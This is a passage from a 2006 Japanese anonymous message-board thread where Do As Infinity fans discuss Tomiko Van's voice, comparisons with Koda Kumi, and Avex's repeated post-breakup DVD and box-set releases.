全くどうでもいいけど、あそこは世界一の規模だから、
世界中から集まってきた核廃棄物に火がつけば
地球は容易く破滅しますよ。チェルノブイリとかの比ではなく。

409 :伝説の名無しさん:2006/07/20(木) 19:56:21
9.11って何年だっけ?
Wgd?リリースは2002.2.27

410 :伝説の名無しさん:2006/07/20(木) 20:37:16
>>409
つ01年

411 :伝説の名無しさん:2006/07/20(木) 21:43:58
SummerDaysの日本語訳置いてるとこありませんか?

412 :伝説の名無しさん:2006/07/20(木) 22:20:18
あんなもん自分で調べた方が早い

413 :伝説の名無しさん:2006/07/20(木) 22:56:18
遠くまで聴いてて思ったんだが、倖田來未の声って伴ちゃんの声に似てないか?

414 :伝説の名無しさん:2006/07/20(木) 23:16:14
>>413
え?
似てるか・・・?

415 :伝説の名無しさん:2006/07/20(木) 23:33:25
似てねーよwwwww

416 :伝説の名無しさん:2006/07/21(金) 01:23:05
違うな。似てない。

417 :伝説の名無しさん:2006/07/21(金) 01:50:39
普通の歌詞なら、Yahoo!にあるんですね。75曲しかないけど…あと、IE以外はお断りだそうです。
ttp://music.yahoo.co.jp/shop/p/52/6921

SUMMER DAYSの日本語詞は↓ここにありました。上から三分の一辺り
ttp://music-d.log.thebbs.jp/1104123744.html

418 :伝説の名無しさん:2006/07/21(金) 09:06:25
>>410
レスサンキュ!
>>413
浜崎なら倖田と似てない?

419 :伝説の名無しさん:2006/07/21(金) 11:19:26
よく言われてるのが、
倖田(デビュー当時)=安室
だよ。

420 :伝説の名無しさん:2006/07/21(金) 11:40:02
伴ちゃんとあんな女を一緒にするな!(´・ω・`)

421 :伝説の名無しさん:2006/07/21(金) 12:05:11
>>420
キミみたいなのがいるからDAIヲタは痛いと思われる

422 :伝説の名無しさん:2006/07/21(金) 14:18:26
どうでもいい

423 :伝説の名無しさん:2006/07/21(金) 18:03:03
熊本は雨がひどいらしい

424 :伝説の名無しさん:2006/07/21(金) 19:46:30
ヨーロッパは熱波がひどいらしい。


前もこんな事なかったか?

425 :伝説の名無しさん:2006/07/21(金) 21:43:28
「めちゃくちゃ好きや中年」ってフレーズは
伴ちゃんが歌った方がええっちゅうねん

426 :伝説の名無しさん:2006/07/21(金) 21:57:48
>>425
そんなことになったら悪い意味で号泣するぞオレはww

427 :伝説の名無しさん:2006/07/21(金) 22:25:45
>>425
ワロスww
伴ちゃんにはそんな曲歌って欲しくない

428 :伝説の名無しさん:2006/07/21(金) 22:44:54
>>425
川 ̄凵P川<そんなのイヤダー

429 :伝説の名無しさん:2006/07/21(金) 23:16:59
ムシャクシャするやっちゅうね〜ん
月曜日も火曜日も〜♪

430 :伝説の名無しさん:2006/07/21(金) 23:58:51
メチャクチャにシてやっちゅうね〜ん
月曜日も火曜日も〜♪

431 :伝説の名無しさん:2006/07/22(土) 00:02:51
なんでここに倖田ヲタが紛れてるの?

432 :伝説の名無しさん:2006/07/22(土) 00:24:38
気候がおかしいから

433 :伝説の名無しさん:2006/07/22(土) 00:25:10
>>431
ヒント:夏厨

434 :伝説の名無しさん:2006/07/22(土) 00:26:04
>>424
ちょwwあったあった。熱波のニュースあったねぇ。

435 :伝説の名無しさん:2006/07/22(土) 00:42:18
>>434
結局フランスの貧困層は昔も今もエアコンが買えないから
またたくさん貧困層の高齢者が死ぬ事になる。

436 :伝説の名無しさん:2006/07/22(土) 00:58:25
伴は浜崎、幸田と違って清潔感があるしこいつらより歌うまいし次元が違うんだよ

437 :伝説の名無しさん:2006/07/22(土) 01:07:02
あーあーこんなとこで浜崎とか倖田とか引き出すなっての
ほぼ8割方荒れるんだから帰れ夏厨

438 :伝説の名無しさん:2006/07/22(土) 01:16:17
そもそもは伴ちゃんがラジオで
「恋愛対象は50歳ぐらいまでイケます」って
言ったのが発端やねん…


439 :伝説の名無しさん:2006/07/22(土) 01:26:03
>>436は伴ヲタを装ったアンチと見た

>>438
俺の親父でもいいのかww

440 :伝説の名無しさん:2006/07/22(土) 19:52:06
AmazonでDo The Boxがついに\4,000に

441 :伝説の名無しさん:2006/07/22(土) 21:07:29
ここまで来ると不憫さすら漂ってくるわ。

442 :伝説の名無しさん:2006/07/22(土) 21:31:22
またDVD出すらしいね


443 :伝説の名無しさん:2006/07/22(土) 21:49:09
>>442
kwsk

444 :伝説の名無しさん:2006/07/22(土) 22:24:09
>>443
つttp://ime.st/www.neowing.co.jp/list_from_code_banner.html?key=6921&media=DVD¤t=0

445 :伝説の名無しさん:2006/07/22(土) 23:21:31
DVDについて携帯支援を(´・ω・`)

446 :伝説の名無しさん:2006/07/22(土) 23:47:44
ちょwwwマジで出るのかよ。
すげぇ根性だなa社は。
どうせ、買うヤツはいるから文句も言えないと・・・・。誰も買わなきゃなぁ。そうすりゃ自信もって苦情出せるのに・・・、「ラストじゃねぇじゃねぇか!!糞がっ!!」

447 :伝説の名無しさん:2006/07/23(日) 00:04:26
Do As Infinity -Premier-

商品番号: AVBD-91430
メディア: DVD
組枚数: 1
発売日: 2006/09/20
価格: 2980円(税込)

2005年9月29日に惜しまれながら解散したDo As Infinity。
彼らの初のLive Tour「Do As Infinity Live Tour 2001」ファイナル公演
@SHIBUYA-AX(2001年5月27日)がファン待望のDVD化!!


Do As Infinity 3rd ANNIVERSARY SPECIAL LIVE

商品番号: AVBD-91429
メディア: DVD
組枚数: 1
発売日: 2006/09/20
価格: 2980円(税込)

2005年9月29日に惜しまれながら解散したDo As Infinity。
当時WOWOWで放送された彼らのデビュー3周年記念ライヴ at 渋谷公会堂
"3rd ANNIVERSARY SPACIAL LIVE"の貴重な映像を遂に商品化!
今作にはライヴ映像に加え、当時のインタビュー映像も収録!!




448 :伝説の名無しさん:2006/07/23(日) 00:19:20
うぜぇコピペすんな。

449 :伝説の名無しさん:2006/07/23(日) 00:33:51
商魂たくましいなw

450 :伝説の名無しさん:2006/07/23(日) 00:47:16
ざけんなゴルァ!!


て、言いたいけど絶対買っちまうんだろうなぁ・・・。

451 :伝説の名無しさん:2006/07/23(日) 00:48:11
サンクス。
グレートフルジャーニーが入ってたら
いくらでも買う。

452 :伝説の名無しさん:2006/07/23(日) 00:59:53
>>421
ただ単に倖田が嫌いなだけ(´・ω・`)

453 :伝説の名無しさん:2006/07/23(日) 01:00:55
何か売り方が余りに酷くてもう見てられない。
この調子でこれからも半年毎に蔵から引っ張ってくるのだろうか。

454 :伝説の名無しさん:2006/07/23(日) 01:09:39
これでオフィもまた非難の嵐だろうな

455 :伝説の名無しさん:2006/07/23(日) 01:23:41
2980円が1980円くらいに値崩れしたら買おうかな

456 :伝説の名無しさん:2006/07/23(日) 01:30:36
松浦ってラストの意味わかってないんじゃないのか?

出来る限りなら見たい……だがここで買ってしまうとあの時の
「これがDAIに費やす最後のアイテムだ」という哀愁感を否定することになるorz

457 :伝説の名無しさん:2006/07/23(日) 01:44:04
なんでエイベはDAIにここまで固執するの?DAIサイドに圧力でもかけてるわけ?

458 :伝説の名無しさん:2006/07/23(日) 02:27:19
>>457
固執ってw
DAIだけ特別とでも思ってんの?
エイベは乱発はどの歌手でも普通だからw

459 :伝説の名無しさん:2006/07/23(日) 06:35:09
「ラストアイテム」の定義 = 「ラストを飾るアイテム」

460 :伝説の名無しさん:2006/07/23(日) 08:34:04
まだファンじゃなかったときの秘蔵映像が見られるのは嬉しいが、ラストアイテムってのと矛盾してる

461 :伝説の名無しさん:2006/07/23(日) 09:28:09
datもかわいそうだな。今頃ファン投票ベストって…
浜崎とか倖田とか大塚とか、大物アーは予想通り何もなかったよ。
搾れるだけ搾ろうとする感じ
よっぽど赤字アーだったんだろうな。

462 :伝説の名無しさん:2006/07/23(日) 10:07:34
DAIでも1万くらいしかいってないのにdatは・・・(((((゚Д゚)))))ガクガクブルブル

売上悪かったら価値下げてまで徹底的に稼ぐのかよ。
マジこの売上至上主義会社腐ってんな。そのうちAAAも食らいそう。
あーあ、DAIがソニーでもいいからそこにいてくれてたならなぁorz

463 :伝説の名無しさん:2006/07/23(日) 10:20:55
伴ちゃんにトーク力があったら2倍は売れてたはず…

464 :伝説の名無しさん:2006/07/23(日) 10:50:23
欽ちゃんみたいにDAIも解散撤回すんじゃね?何でボーカルが伴ちゃんじゃねぇんだみたいな

465 :伝説の名無しさん:2006/07/23(日) 13:11:12
いずれは出すと思ったけど、早過ぎ

最後はa-nation全パフォーマンスとかも出しそうw

466 :伝説の名無しさん:2006/07/23(日) 13:12:34
投票してください!
http://www.37vote.net/music/1112710321/
http://www.37vote.net/music/1115296251/
http://www.37vote.net/music/1119357170/
http://www.37vote.net/music/1115200152/

467 :伝説の名無しさん:2006/07/23(日) 13:39:13
>>464
川 ̄凵P川<大好きなDAIだったんですが、亮ひとり責められないのでやめることにしました。
川 ̄凵P川<みんなー。DAIはなくなっちゃったよー。

468 :伝説の名無しさん:2006/07/23(日) 15:51:18
>>466
痛いランキングだな

469 :伝説の名無しさん:2006/07/23(日) 16:01:35
DVD2枚も発売すんの?

470 :伝説の名無しさん:2006/07/23(日) 16:35:25
最終兵器は

Do the Works完全版

おそらく来年春の決算期に出る

471 :伝説の名無しさん:2006/07/23(日) 17:47:47
こんな事は容易に予想出来たけどね。
むしろどんどん発売して欲しいよ

472 :伝説の名無しさん:2006/07/23(日) 18:36:14
ラストライブの完全版待ってますよエイベさんw

473 :伝説の名無しさん:2006/07/23(日) 19:06:21
予想してたとか言ってるヤシがいるが
その時点でおかしいことに気づけよ

474 :伝説の名無しさん:2006/07/23(日) 19:12:49
>>473
エイベ糞nの決算期商売に6年も付き合わされてたら、疑い深くなったのさ

475 :伝説の名無しさん:2006/07/23(日) 20:49:27
そもそも決算期商売って何のメリットがあるの?
しかも新曲とかオリアルで勝負ならまだしも、廉価版やらレコ大記念ベストとか
明らかに利益が出なさそうなタイトルばっかぽんぽん乱発しやがって。
アーティストのマイナスイメージの方が大きいのに。
経済学さっぱり分からんから誰か教えて。

476 :伝説の名無しさん:2006/07/23(日) 21:43:15
>>475
既にレコーディングされた音源を二次利用するだけだから
アーティストやミュージシャンを拘束する必要がない
つまり、オリジナルを制作するより制作日数もコストがかからない
アーティストは売上があれば印税が入るから文句言わないだろうし

今回発売するDVDの映像は、WOWOWやスカパーで放送された映像だから制作費はテレビ局側が大半を負担している

放送からも年数が経ってるし、アーティスト肖像権はavexにあるだろうから商品化には何の障害もない

どう転んでも、儲かる仕組みです

477 :伝説の名無しさん:2006/07/24(月) 00:00:16
なんだかなぁ…

478 :伝説の名無しさん:2006/07/24(月) 00:29:59
>>475
あそこはアーティストのイメージなんてどうでもいいんだよ
所属アーもそのファンもほぼ金づるとしか見てないんだから

479 :伝説の名無しさん:2006/07/24(月) 00:31:52
そしてそんな会社にデビューさせてもらったグループ

480 :伝説の名無しさん:2006/07/24(月) 00:43:46
もともと浜崎ら(=豆腐)の提供曲としてはボツになったけど…って曲を
消化するためのグループ(=おから)

481 :伝説の名無しさん:2006/07/24(月) 01:35:12
長尾も一緒にテレビでてたらまた変わってたかな?

482 :伝説の名無しさん:2006/07/24(月) 02:59:23
それでも俺は買う

483 :伝説の名無しさん:2006/07/24(月) 08:04:51
最近このグループ知ってベスト聴いたんだが
他にこれは聴いとけってアルバムある?

484 :伝説の名無しさん:2006/07/24(月) 08:16:20
>>483
今AmazonならアルバムBOX4,00円なので
単品買いするよりは、これを買うのがお得かと

485 :伝説の名無しさん:2006/07/24(月) 09:42:56
>>484
ちょwww400円ってww

486 :伝説の名無しさん:2006/07/24(月) 10:34:54
400円キターーーーーーーーーーーーーー!!!!!!!!!!!!!
買います。

487 :伝説の名無しさん:2006/07/24(月) 10:45:10
>>480
浜崎が吟醸酒なら、DoAsInfinityは酒カスで作られた甘酒…

488 :伝説の名無しさん:2006/07/24(月) 11:05:39
4000円でした。買いませんでした。

489 :伝説の名無しさん:2006/07/24(月) 11:12:10
もうこの際だから

「持ち出し厳禁」

再発売してください

490 :伝説の名無しさん:2006/07/24(月) 12:06:56
>>487
伴ちゃんの機嫌が悪くなるわけだ(´・ω・`)

491 :読者の声:2006/07/24(月) 12:14:34
http://www.amazon.co.jp/gp/product/B000E9T29M
/250-4828637-8101019?v=glance&n=561956&s=gateway

まだ\6000じゃない?

492 :伝説の名無しさん:2006/07/24(月) 12:22:35
うん。てきとうに4000円て言った。

493 :伝説の名無しさん:2006/07/24(月) 13:34:02
>>489
それだ

494 :伝説の名無しさん:2006/07/24(月) 16:05:30
>>466紅白のやつに投票しちゃった

495 :伝説の名無しさん:2006/07/24(月) 16:12:28
どうせなら、Do The BEST出してくれないかな。
2000円くらいで。

496 :伝説の名無しさん:2006/07/24(月) 21:52:38
昔のライブ映像をガンガン出して欲しい

497 :伝説の名無しさん:2006/07/25(火) 00:24:39
高級品より、B級食い物の方がおいしいことだってあるさ

498 :伝説の名無しさん:2006/07/25(火) 10:29:46
BOXみたいに既発の商品に付加価値つけて
売りつけようってのはちょっとあれだけど、
今回のDVDみたいに商品化されていないものなら
良いんじゃないか?
ま、AXの映像は一部商品化されてるけどさ。

おれは両方ともWOWOWで観たけど、
DVD画質でもう一度観られるなら買う価値もありかと。

そういえば、国際フォーラムの年越しもスカパーで
放送したよね。
あれもそのうち出てきそうだね。


しかしAXのライブは、VANちゃんにとって最大の汚点だと
思うけど、さすがにやめてくれとは言えなかったんだろうなww



499 :伝説の名無しさん:2006/07/25(火) 11:07:17
>>498
伴ちゃんにとって汚点って何かあったのか?
詳しく

500 :伝説の名無しさん:2006/07/25(火) 11:55:34
深い森の途中で歌えなくなって泣いてしまった…

501 :読者の声:2006/07/25(火) 12:03:39
映像化することに問題があるんじゃなくて発売の時期にブーイングが来てるんでしょ。
確かに何で今頃?って思うし。>>489じゃないけどマジで持ち出し厳禁の再発とか出そうだし。
にしてもオフィのBBSあまり盛り上がってないね。いつもなら1日1ページのペースだったのに
多くて1日に5レスぐらい…みんな次のアーを見つけたってことやね。

502 :伝説の名無しさん:2006/07/25(火) 12:26:33
>発売の時期にブーイングが来てるんでしょ。
>確かに何で今頃?って思うし。

解散1周年記念…

503 :498:2006/07/25(火) 12:36:16
>>499
声はひっくり返るは、MCはグダグダ。
正直あの時はアマチュア以下でした。

>>501
3月に出たラストアイテムが
ラストじゃないって話ね。
確かに糞のやり方は相変わらず
あれだけど、せっかくの記録が
埋もれてしまうよりは良いでしょ。


504 :伝説の名無しさん:2006/07/25(火) 19:42:37
>>501
話題がないだけ
それとオフィを覗く気力もない

505 :伝説の名無しさん:2006/07/26(水) 13:19:48
まぁ、今回に限っては神期の伴ちゃんが見れるってことで有り難いかな。
今回も長夫は全部カットかな?

506 :伝説の名無しさん:2006/07/26(水) 18:54:07
ファイナルのDVD買ってよかったんで、
ライブインジャパンUも買ったんだけど、

Uの方はカメラワークが悪すぎ、基本的に伴と亮しかズームしないし、
亮じゃない方のギターの人とか上手いのにぜんぜん写っていなかったし、

菜ノ花畑でも、キーボードの人が後ろでせっかくピアノを弾いているのに
伴だけしか写っていなかったし、

あれみた後、ファイナルのDVDをみると、ファイナルの方がカメラワークがいいなと思った。

この二つ以外の他のDAIのDVDもライブインジャパンUみたいなカメラワークなのかな?

507 :伝説の名無しさん:2006/07/26(水) 20:42:05
持ち出し厳禁age

508 :伝説の名無しさん:2006/07/27(木) 01:11:25
>>506
カメラワークで一番よかったのはNYLツアー予告編の
AXのやつ。松本さんにも専用のカメラがついてて
まるで7人全員が正式メンバーのバンドのようだった。
日テレで90分枠で放送したがどうせこの流れなら
そのうちDVD出るだろう。

509 :伝説の名無しさん:2006/07/27(木) 15:13:52
どうせならグレイティストイアーズとトゥルーソングアーだせばいいのに
撮ってるか知らんけど
ついでにコンタクトのシークレットライブ
a-nationまとめたやつ
スタンディングオンザヒル聴きたス

510 :伝説の名無しさん:2006/07/27(木) 15:24:25
TRUE SONGはアルバムツアーなのにDVD化されてないのは謎

511 :伝説の名無しさん:2006/07/27(木) 15:24:26
持ち出し厳禁って

どうせ亮がくっちゃべってるだけでしょ?

512 :伝説の名無しさん:2006/07/27(木) 19:23:01
TSのって映像ないんじゃなかったか?
あるなら見たいけど・・・
持ち出し厳禁見たい

>>508
それ友達にわざわざDVDに録って貰ったのにPCで見れなかった・・・_| ̄|●|||

513 :伝説の名無しさん:2006/07/27(木) 20:16:13
今日のうたばんに林部さんは出るのかな

514 :伝説の名無しさん:2006/07/27(木) 20:21:34
BE(ベー)=林部さん キタ━━━━━━(゚∀゚)━━━━━━!!!!!!

515 :伝説の名無しさん:2006/07/27(木) 21:34:24
持ち出し厳禁の後半は髭よりむしろ伴ちゃんのほうがしゃべってる。
伴ちゃんいわく…
『あたしって酔っ払うとよくしゃべるねー』
だそうだ。っていうかその通り。

516 :伝説の名無しさん:2006/07/27(木) 22:00:58
イク・ナク・イク

517 :伝説の名無しさん:2006/07/27(木) 22:46:37
商魂たくましいエイベにしては何を血迷ったか
TSはカメラ入れてなかった。

ただNORIマネージャーらが反省会用の家庭用ハンディは
各会場で回してた。

オールスタンディング'02はカウントダウンライブがTV放送されてたら
DVD化可能だよな

あと04年にBSフジの番組用にライブしたのも
フジテレビが許可すれば商品化可能だな

518 :伝説の名無しさん:2006/07/27(木) 23:38:03
林部さん一言も話さなかった(´・ω・`)

519 :伝説の名無しさん:2006/07/27(木) 23:49:24
NHKで放送されたNEED YOUR LOVEライブ見た人いる?
俺途中から見たんで録画しなかったんだけど、あれ伴ちゃんのインタビューとか結構多めに入っててかなり良かったんだけど、もう一度DVDで見たいな。
DVD化されたら即買うのに。

520 :伝説の名無しさん:2006/07/28(金) 07:36:16
>>519
それ2回見た
録画もしたけど画質ワロス…(´・ω・`)
それが入ってるビデオ、テープ切れそうだしorz

ライブシーンはカットされまくりだったが、ほかではなかなか見られない貴重なインタビューとかあって良かった
さすがにあれはDVD化しないんじゃね?

521 :伝説の名無しさん:2006/07/28(金) 08:17:53
NHKに使用料をとられるなら、エイベはわざわざ手を出さないだろうな

522 :伝説の名無しさん:2006/07/28(金) 11:19:49
NHKのってこれですか
ttp://www.youtube.com/watch?v=kcbHBbaZSwk
伴ちゃんカコヨイ 見てて鳥肌たった

523 :伝説の名無しさん:2006/07/28(金) 13:17:36
そう?なんか声が聴いてて全然迫力も糞もないんだけど・・・。
アンチじゃないぜ。素直にこりゃひどいと思った。
服装はヴィジュアル系?やっぱこの世はヴィジュアル系でしょ。
きいてみ。演奏力あるから、バンドによっては。

90 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)